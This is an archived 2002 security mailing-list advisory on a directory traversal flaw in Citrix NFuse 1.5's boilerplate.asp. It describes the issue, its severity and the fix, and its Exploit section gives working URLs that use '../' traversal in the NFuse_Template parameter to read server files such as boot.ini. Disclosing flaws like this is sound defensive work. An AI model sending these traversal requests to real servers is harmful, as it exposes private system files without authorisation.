[NEWS] Citrix NFuse Directory Traversal with boilerplate.asp
From: support@securiteam.comDate: 03/29/02
- Previous message: support@securiteam.com: "[EXPL] Root Compromise through LogWatch (Exploit code)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Fri, 29 Mar 2002 13:20:34 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Citrix NFuse Directory Traversal with boilerplate.asp
------------------------------------------------------------------------
SUMMARY
Citrix NFuse is an application portal that provides organizations with the
ability to integrate and publish interactive applications into any
standard web browser. NFuse is a three-tier solution that includes a
Citrix Server component, a Web Server component, and a Citrix ICA client
component with a web browser. A security vulnerability in the product
allows attackers to retrieve files that reside on the remote server after
they have authenticated with it (i.e. download any file that reside even
outside the bounding HTML root directory).
DETAILS
Vulnerable systems:
NFuse version 1.5
Given that you must be authenticated first, one assumes that you have some
minimal level of trust for the end user, so the severity is not that high.
However since sensitive files can be accessed, this kind of vulnerability
might prove to be dangerous. Further several Internet based sites require
no such authentication placing them in danger.
Solution:
According to Citrix, this issue is only in NFuse version 1.5 as the
boilerplate.asp no longer exists in the most recent version.
Exploit:
A command such as:
http://10.x.x.x/boilerplate.asp?NFuse_Template=template.ica&NFuse_Application=Attorneyx0020Homex0020Directory&NFuse_MIMEExtension=.ica
Can be replaced with one like this:
http://10.x.x.x/boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/
Or alternatively:
http://10.x.x.x/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories
ADDITIONAL INFORMATION
The information has been provided by <mailto:budke@budke.com> Eric Budke.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[EXPL] Root Compromise through LogWatch (Exploit code)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
